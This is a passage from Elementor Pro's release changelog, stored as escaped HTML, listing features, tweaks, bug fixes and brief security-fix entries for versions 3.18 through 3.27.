Elements<\\/li>\\n<li>Security Fix: Improved code security enforcement in Global widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Admin settings<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Empty custom fields are missing in the Dynamic Tags options in Display Conditions for Elements<\\/li>\\n<\\/ul>\\n<h4>3.27.0 - 2025-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Removed the <code>elementor-widget-container<\\/code> div from the Menu, Loop, Table of Contents, Form, and Hotspot widgets as part of the Optimized Markup experiment to improve HTML structure<\\/li>\\n<li>Tweak: Reduced DOM size by optimizing the submit button markup in Search widget<\\/li>\\n<li>Tweak: Moved style loading to the head instead of the footer to improve CLS<\\/li>\\n<li>Tweak: Enabled conditional loading of Swiper.js based on widget dependencies to reduce unnecessary assets and improve page load times<\\/li>\\n<li>Tweak: Standardized navigation elements like arrows and bullets across all carousel and slider widgets for improved accessibility<\\/li>\\n<li>Tweak: Improved accessibility when the submit button has only an icon and no text in Search widget<\\/li>\\n<li>Tweak: Removed <code>load_plugin_textdomain()<\\/code> function from Elementor Pro<\\/li>\\n<\\/ul>\\n<h4>3.26.3 - 2025-01-07<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Search widget<\\/li>\\n<li>Fix: Height issues cause slideshow thumbnails to display incorrectly in Media Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29663\\\">#29663<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.2 - 2024-12-22<\\/h4>\\n<ul>\\n<li>Fix: Menu items are not clickable in various scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29191\\\">#29191<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.1 - 2024-12-17<\\/h4>\\n<ul>\\n<li>Fix: Restore deprecated <code>Plugin::enqueue_styles()<\\/code> function to avoid errors with 3rd party plugins<\\/li>\\n<\\/ul>\\n<h4>3.26.0 - 2024-12-16<\\/h4>\\n<ul>\\n<li>New: Introducing dynamic content support for Off-canvas in Loop Grid widget templates - enabling seamless display of additional content dynamically (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29049\\\">#29049<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28935\\\">#28935<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7106\\\">#7106<\\/a>)<\\/li>\\n<li>New: AdBlock Detection trigger for Popups - display targeted popups for visitors using ad blockers<\\/li>\\n<li>New: Added Reload Page link action for Dynamic Tags<\\/li>\\n<li>Tweak: Added "Space Between Dots" control to Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2526\\\">#2526<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3277\\\">#3277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21697\\\">#21697<\\/a>)<\\/li>\\n<li>Tweak: Replaced hidden <code>elementor-screen-only<\\/code> div with <code>aria-label<\\/code> attributes<\\/li>\\n<li>Tweak: Removed <code>elementor-widget-container<\\/code> div from Elementor widgets as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Optimize popup styling by loading it only when necessary<\\/li>\\n<li>Tweak: Updated Gap between slides control to support only PX units in Carousel widget<\\/li>\\n<li>Tweak: Removed the dependency between the Tabs handler and the Menu handler<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> in Carousel widgets<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=carousel<\\/code> to carousel wrapper<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=slide<\\/code> to slide wrapper<\\/li>\\n<li>Tweak: Optimized carousel widgets markup as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Updated minimum required Safari version to 15.5<\\/li>\\n<li>Tweak: Facebook widgets are no longer supported on mobile due to Facebook functionality changes<\\/li>\\n<li>Fix: Motion Effects sticky feature is not working when Scroll Snap is enabled<\\/li>\\n<li>Fix: Custom Image Resolution option is not working in Gallery widget<\\/li>\\n<li>Fix: 'Reading Settings' unexpectedly reduces the number of posts displayed when using the Archive with Pagination setting<\\/li>\\n<li>Fix: Step Form does not scroll to the top when the first field is not an input field in Form widget<\\/li>\\n<li>Fix: Display Condition feature is available without an active Elementor license in Floating Elements<\\/li>\\n<li>Fix: Background options of Flip Box in Loop Grid widget are not working when images are added using ACF Dynamic Tags<\\/li>\\n<li>Fix: Dropdown icon in the Select field of the Form widget is cut off when the Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Incompatibility between Form widget and WPML when using Nested Elements<\\/li>\\n<li>Fix: Performance issues when changing the title name in the Menu widget<\\/li>\\n<li>Fix: Warnings appear when Element Caching is set to Inactive in Carousel widgets<\\/li>\\n<li>Fix: Swiper styling missing from Lightbox inside Gallery widgets<\\/li>\\n<\\/ul>\\n<h4>3.25.5 - 2024-12-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Popup overlay shown for non-logged users even when disabled<\\/li>\\n<\\/ul>\\n<h4>3.25.4 - 2024-11-20<\\/h4>\\n<ul>\\n<li>Tweak: Improved Global Widget loading method to enhance performance<\\/li>\\n<\\/ul>\\n<h4>3.25.3 - 2024-11-13<\\/h4>\\n<ul>\\n<li>Fix: Nested Elements are activated even when the Container experiment is inactive<\\/li>\\n<\\/ul>\\n<h4>3.25.2 - 2024-11-03<\\/h4>\\n<ul>\\n<li>Fix: Styling issues affecting popup layout when using a Dynamic Tag to open the popup<\\/li>\\n<li>Fix: Image captions are not displaying for non-logged-in users in Media Carousel widget<\\/li>\\n<li>Fix: Custom Add to Cart widget with Quantity enabled causes critical error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29159\\\">#29159<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.25.1 - 2024-10-31<\\/h4>\\n<ul>\\n<li>Fix: Multiple Custom Add to Cart widgets on the same page are adding the same product<\\/li>\\n<\\/ul>\\n<h4>3.25.0 - 2024-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added pagination functionality to the Live Results in Search widget<\\/li>\\n<li>Tweak: Added Anchor Offset control to allow precise positioning when scrolling to anchor links on the page<\\/li>\\n<li>Tweak: Load motion effects styles only when they are in use<\\/li>\\n<li>Tweak: Load sticky styles only when they are in use<\\/li>\\n<li>Tweak: Load popup styles only when they are in use<\\/li>\\n<li>Tweak: Load theme builder styles only when they are in use<\\/li>\\n<li>Tweak: Load transition styles for Call to Action and Gallery widgets only when they are in use<\\/li>\\n<li>Tweak: Load styles for Form widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for WooCommerce widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Theme Elements widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Carousel widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Pricing widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Floating Elements separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Link in Bio widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load minified CSS in the Loop Builder's Call to Action button in the Editor<\\/li>\\n<li>Tweak: Removed "Payments" module styles<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Payapl widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Stripe widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Merged "Form Submissions" feature into the version and moved it to the Advanced tab<\\/li>\\n<li>Tweak: Merged "Display Conditions" into the version<\\/li>\\n<li>Fix: Missing translation string for the empty message in the Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27580\\\">#27580<\\/a>)<\\/li>\\n<li>Fix: Local Storage and Session Storage were being used even when popups were not in use (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7151\\\">#7151<\\/a>)<\\/li>\\n<li>Fix: Masonry layout is not working when pagination is set to "Load More" or "Infinite Scroll" in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23684\\\">#23684<\\/a>)<\\/li>\\n<li>Fix: Extra gap between widgets on the frontend when using Off-canvas widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27706\\\">#27706<\\/a>)<\\/li>\\n<li>Fix: Pagination and custom queries did not work when the Posts Widget was saved as a Global Widget or used via shortcode<\\/li>\\n<li>Fix: Lightbox videos are missing controls and displayed at the wrong size in Media Carousel widget<\\/li>\\n<li>Fix: Pagination options with Individual Pagination not working as expected in Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Justified or Masonry layouts for the Pro Gallery would not display images on the frontend when inserted via nested tabs<\\/li>\\n<li>Fix: Error issue in the Loop Grid widget when used in theme parts with the Taxonomy Filter<\\/li>\\n<li>Fix: Removed the focus ring after clicking to open the Off Canvas inside the Editor<\\/li>\\n<li>Fix: Background gradient colors from the dynamic color tag values are not rendering on the frontend<\\/li>\\n<li>Fix: Excessive database requests generated by the Loop Grid widget<\\/li>\\n<li>Fix: Colors from Dynamic Tags were not rendered on the frontend<\\/li>\\n<li>Fix: Display issue in the Menu widget caused by the 'Native Intersection Observer API<\\/li>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget<\\/li>\\n<li>Fix: Content Width control inside the Mega Menu is displaying an empty value<\\/li>\\n<\\/ul>\\n<h4>3.24.4 - 2024-10-09<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<\\/ul>\\n<h4>3.24.3 - 2024-10-01<\\/h4>\\n<ul>\\n<li>Fix: Floating Elements template not loading when Single Page template is set with All Singular condition<\\/li>\\n<li>Fix: Form field styles not loading properly in various scenarios<\\/li>\\n<\\/ul>\\n<h4>3.24.2 - 2024-09-18<\\/h4>\\n<ul>\\n<li>Fix: Icons not displaying when Inline SVG Icons experiment is active in Link In Bio widgets and Floating Elements<\\/li>\\n<\\/ul>\\n<h4>3.24.1 - 2024-09-12<\\/h4>\\n<ul>\\n<li>Fix: Widget styles not loading correctly on front causing alignment inconsistencies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28676\\\">#28676<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.24.0 - 2024-09-10<\\/h4>\\n<ul>\\n<li>New: Introducing support for Variable Fonts - allowing for more dynamic and flexible text styling (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6703\\\">#6703<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11333\\\">#11333<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19277\\\">#19277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25485\\\">#25485<\\/a>)<\\/li>\\n<li>Tweak: Added 'Structure' indication for widgets with Display Conditions applied (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28027\\\">#28027<\\/a>)<\\/li>\\n<li>Tweak: Added a new option for setting the live search results width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28280\\\">#28280<\\/a>)<\\/li>\\n<li>Tweak: Improved Honeypot field functionality in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28480\\\">#28480<\\/a>)<\\/li>\\n<li>Tweak: Added options to 'Copy', 'Paste', and 'Clear' Display Conditions in Context Menu<\\/li>\\n<li>Tweak: Improved performance of the Menu widget when using Dynamic Tags in the URL field<\\/li>\\n<li>Tweak: Improved performance when using Dynamic Tags in Nested Elements<\\/li>\\n<li>Tweak: Added the option for users to disable Akismet for specific Elementor forms<\\/li>\\n<li>Tweak: Adjusted URL structure when presenting the Search Archive page in Search widget<\\/li>\\n<li>Tweak: Added the 'Create Template' button in Search widget<\\/li>\\n<li>Tweak: Added an option to enable the 'Loader' animation while live results are loading in Search widget<\\/li>\\n<li>Tweak: Load share buttons compatibility styles only when they are in use<\\/li>\\n<li>Tweak: Load dialog styles only when they are in use<\\/li>\\n<li>Tweak: Load global widget styles only during Editor preview<\\/li>\\n<li>Tweak: Conditionally load widget styles only when the widgets are used<\\/li>\\n<li>Tweak: Load styles for CTA hover animations only when they are in use<\\/li>\\n<li>Tweak: Load notes styles only when the WordPress Toolbar is displayed<\\/li>\\n<li>Tweak: Split <code>animations.min.css<\\/code> into multiple CSS files and load them conditionally<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Stable status<\\/li>\\n<li>Tweak: Merged Taxonomy Filter feature into the version<\\/li>\\n<li>Tweak: Merged Search feature into the version<\\/li>\\n<li>Tweak: Added a note to 'Current Query' explaining the impact of WordPress settings on pagination within Archives<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for the Off-Canvas widget<\\/li>\\n<li>Fix: Manual Selection option is not excluding sticky posts in Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18689\\\">#18689<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23331\\\">#23331<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28179\\\">#28179<\\/a>)<\\/li>\\n<li>Fix: Template ID does not change according to the imported Loop Item (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21404\\\">#21404<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22202\\\">#22202<\\/a>)<\\/li>\\n<li>Fix: 'Editing Mode' for the Off-canvas was not functioning correctly in certain scenarios<\\/li>\\n<li>Fix: Added definition to <code>clear_custom_image_sizes<\\/code> hook to prevent edge case issues<\\/li>\\n<li>Fix: Flickering issue with search result buttons when closing results using the keyboard escape key in Search widget<\\/li>\\n<li>Fix: Theme Style settings for buttons were overriding the text styling in Search widget<\\/li>\\n<li>Fix: Nesting menu inside another menu causes functionality issues in Menu widget<\\/li>\\n<li>Fix: Error when using array as custom fields value in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.23.3 - 2024-08-05<\\/h4>\\n<ul>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28194\\\">#28194<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.23.2 - 2024-07-29<\\/h4>\\n<ul>\\n<li>Fix: Horizontal scroll bar appearing on the page when using Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28087\\\">#28087<\\/a>)<\\/li>\\n<li>Fix: Dropdown area disappearing in certain scenarios in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.23.1 - 2024-07-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in link URL<\\/li>\\n<\\/ul>\\n<h4>3.23.0 - 2024-07-15<\\/h4>\\n<ul>\\n<li>New: Search Widget with Live Results - Display live search results as visitors type into the search box, enhancing user experience and engagement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27664\\\">#27664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24931\\\">#24931<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21459\\\">#21459<\\/a>)<\\/li>\\n<li>Tweak: Renamed <code>width<\\/code> to <code>Min width<\\/code> and added <code>Max width<\\/code> control to Hotspot tooltips (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18930\\\">#18930<\\/a>)<\\/li>\\n<li>Tweak: Applied a logical DOM order to the Mega Menu widget to improve accessibility<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for WordPress Menu widget<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for Menu widget<\\/li>\\n<li>Tweak: Added a bottom option to the Image Position control in Call to Action widget<\\/li>\\n<li>Fix: Missing version string in included CSS query string when Improved CSS Loading is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21879\\\">#21879<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23821\\\">#23821<\\/a>)<\\/li>\\n<li>Fix: Form submission icon message does not display correctly when Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Save and Close button position issues in the conditions screen in Theme Builder.<\\/li>\\n<li>Fix: Focus appears on the first element when using the mouse to open Off-Canvas<\\/li>\\n<li>Fix: Links to Elementor Settings are broken in various locations<\\/li>\\n<li>Fix: Conditions field not showing all relevant conditions in Theme Builder<\\/li>\\n<li>Fix: Off-Canvas flickering in sticky containers with exit animations triggered by sticky effects<\\/li>\\n<\\/ul>\\n<h4>3.22.1 - 2024-06-24<\\/h4>\\n<ul>\\n<li>Fix: Styling of Global widgets not loading when Element Caching experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27704\\\">#27704<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.22.0 - 2024-06-16<\\/h4>\\n<ul>\\n<li>New: Introducing Off-Canvas widget - create engaging and creative layers triggered by a link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6225\\\">#6225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21769\\\">#21769<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25770\\\">#25770<\\/a>)<\\/li>\\n<li>Tweak: Added option to remove 'User IP' and 'User Agent' from the form submissions metadata (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14285\\\">#14285<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>waypoints.js<\\/code> library with the native Intersection Observer API<\\/li>\\n<li>Tweak: Extended Alignment and Position capabilities in Form widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Flip Box widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Call to Action widget<\\/li>\\n<li>Tweak: Optimized Form widget to eliminate unnecessary markup when the button icon is empty<\\/li>\\n<li>Tweak: Optimized Posts widget to eliminate unnecessary markup when Load More button text is empty<\\/li>\\n<li>Tweak: Remove <code>placeholder<\\/code> arguments from URL controls<\\/li>\\n<li>Tweak: Implemented CSS logical properties to Icon Position in Form, Posts and Menu Cart widgets<\\/li>\\n<li>Tweak: Activated Display Conditions feature for existing sites<\\/li>\\n<li>Tweak: Activated Taxonomy Filter feature for existing sites<\\/li>\\n<li>Tweak: Added functionality to delay the running of the ready triggers on inner elements<\\/li>\\n<li>Fix: Icons are now part of the link in the Menu Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24298\\\">#24298<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25112\\\">#25112<\\/a>)<\\/li>\\n<li>Fix: <code>all: unset<\\/code> assigned to buttons cause focus issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24322\\\">#24322<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25448\\\">#25448<\\/a>)<\\/li>\\n<li>Fix: Menu cart SVG icon disappears on front when Optimized Control Loading experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27342\\\">#27342<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro auto-updates are not working on multisite networks (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12615\\\">#12615<\\/a>)<\\/li>\\n<li>Fix: PHP error appears in the editor when using Loop Grid in an archive template<\\/li>\\n<li>Fix: UI glitch on Icon Position control in Paypal and Stripe Buttons widgets<\\/li>\\n<li>Fix: Icon Position control RTL issue in Hotspot widget<\\/li>\\n<li>Fix: Manual Selection "Include By" Query doesn't work with product categories<\\/li>\\n<\\/ul>\\n<h4>3.21.3 - 2024-05-20<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Loop Grid widget<\\/li>\\n<li>Fix: License expired affects the Display Conditions functionality in the front end<\\/li>\\n<\\/ul>\\n<h4>3.21.2 - 2024-04-30<\\/h4>\\n<ul>\\n<li>Fix: Special characters are not displayed correctly when using the Excerpt widget in Loop template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25860\\\">#25860<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.21.1 - 2024-04-24<\\/h4>\\n<ul>\\n<li>Fix: Excerpt Length setting doesn't function correctly for languages with non-English characters in Post Excerpt widget<\\/li>\\n<\\/ul>\\n<h4>3.21.0 - 2024-04-15<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Taxonomy Query - Enabling the display of post and product categories and tags within Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21372\\\">#21372<\\/a>)<\\/li>\\n<li>Tweak: Optimized Hotspot widget to prevent rendering when no image is provided<\\/li>\\n<li>Tweak: Optimized Blockquote widget to eliminate unnecessary markup when devoid of content<\\/li>\\n<li>Tweak: Optimized Template widget to eliminate unnecessary markup when no template is selected<\\/li>\\n<li>Tweak: Optimized Code Highlight widget to eliminate unnecessary markup when there is no content<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Portfolio widget<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Author Avatar image alt text in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25440\\\">#25440<\\/a>)<\\/li>\\n<li>Tweak: Notes feature merged to version<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Profile Picture alt text in Author widget<\\/li>\\n<li>Fix: Display issue on hover state in WooCommerce Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.20.3 - 2024-04-10<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issue between the My Account widget and other third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20986\\\">#20986<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.20.2 - 2024-03-26<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Post Navigation widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Gallery widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.20.1 - 2024-03-20<\\/h4>\\n<ul>\\n<li>Fix: Strengthened code integrity in deprecated Woo Single Element widget<\\/li>\\n<li>Fix: PHP error notice appears when using Loop Grid with the Taxonomy Filter widgets<\\/li>\\n<\\/ul>\\n<h4>3.20.0 - 2024-03-11<\\/h4>\\n<ul>\\n<li>Tweak: Implemented OR logic in the Display Conditions feature<\\/li>\\n<li>Tweak: Added X and Threads social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25299\\\">#25299<\\/a>)<\\/li>\\n<li>Tweak: Added Archive Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Alt dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Caption dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Bio dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Email dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Website dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Page Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Post Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Comments Number rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Archive Author rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added support for WordPress Custom Fields in Display Conditions feature<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23875\\\">#23875<\\/a>)<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Login widget<\\/li>\\n<li>Tweak: Added additional style controls in the Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration option in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21295\\\">#21295<\\/a>)<\\/li>\\n<li>Tweak: Added Transition Duration to button in Flip Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Author Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to List in Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Login widget<\\/li>\\n<li>Tweak: Added Transition Duration in Post Navigation widget<\\/li>\\n<li>Tweak: Added Transition Duration Show More in Video Playlist widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Form widget<\\/li>\\n<li>Tweak: Removed separator-none argument from all Editor controls<\\/li>\\n<li>Tweak: Add <code><time><\\/code> wrapper for Date and Time items in Post Info widget<\\/li>\\n<li>Tweak: Page Transitions feature merged to version<\\/li>\\n<li>Tweak: Scroll Snap feature merged to version<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Beta status and activated for new sites<\\/li>\\n<li>Tweak: Promoted Taxonomy Filter feature to beta status and activated for new sites<\\/li>\\n<li>Fix: Page Transitions feature and Load Font Awesome 4 Support cause a console error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18885\\\">#18885<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19334\\\">#19334<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21082\\\">#21082<\\/a>)<\\/li>\\n<li>Fix: Added better output escaping in Taxonomy Filter widget<\\/li>\\n<\\/ul>\\n<h4>3.19.3 - 2024-02-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved Loop CSS loading structure in Loop Grid item<\\/li>\\n<li>Security Fix: Addressed security weaknesses in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.19.2 - 2024-02-07<\\/h4>\\n<ul>\\n<li>Fix: Export data inconsistencies when using form actions in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.19.1 - 2024-02-05<\\/h4>\\n<ul>\\n<li>Fix: Enqueuing non-existing Loop Template CSS file in Loop Item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24959\\\">#24959<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>3.19.0 - 2024-01-29<\\/h4>\\n<ul>\\n<li>New: Introducing Display Conditions for Elements - allowing users to customize content visibility based on specified criteria (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4246\\\">#4246<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21152\\\">#21152<\\/a>)<\\/li>\\n<li>New: Implemented Akismet Integration for enhanced spam protection and security in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11401\\\">#11401<\\/a>)<\\/li>\\n<li>New: Introducing Permissions functionality to Element Manager - providing users with enhanced control over access and management capabilities<\\/li>\\n<li>Tweak: Added styling option for dropdown indicator in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21907\\\">#21907<\\/a>)<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Implemented CSS logical properties in WordPress Menu widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Reviews widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Countdown widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Updated <code>jquery.smartmenus.js<\\/code> version from 1.1.1 to 1.2.0<\\/li>\\n<li>Fix: Dynamic Background Image does not load on the first Loop Item in a Loop Grid (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21489\\\">#21489<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22368\\\">#22368<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23085\\\">#23085<\\/a>)<\\/li>\\n<li>Fix: History panel deprecation notices in console log<\\/li>\\n<li>Fix: Second Pro rollback installed the latest version instead of the specifically selected older version<\\/li>\\n<li>Fix: Incorrect position of the dropdown content when applying entrance animation in Menu Widget<\\/li>\\n<li>Fix: UX issues when using in-place editing in Menu widget<\\/li>\\n<li>Fix: Pagination with page reload is not working when used with the Taxonomy filter and Loop Grid widget in Archive template<\\/li>\\n<\\/ul>\\n<h4>3.18.2 - 2023-12-20<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Price List 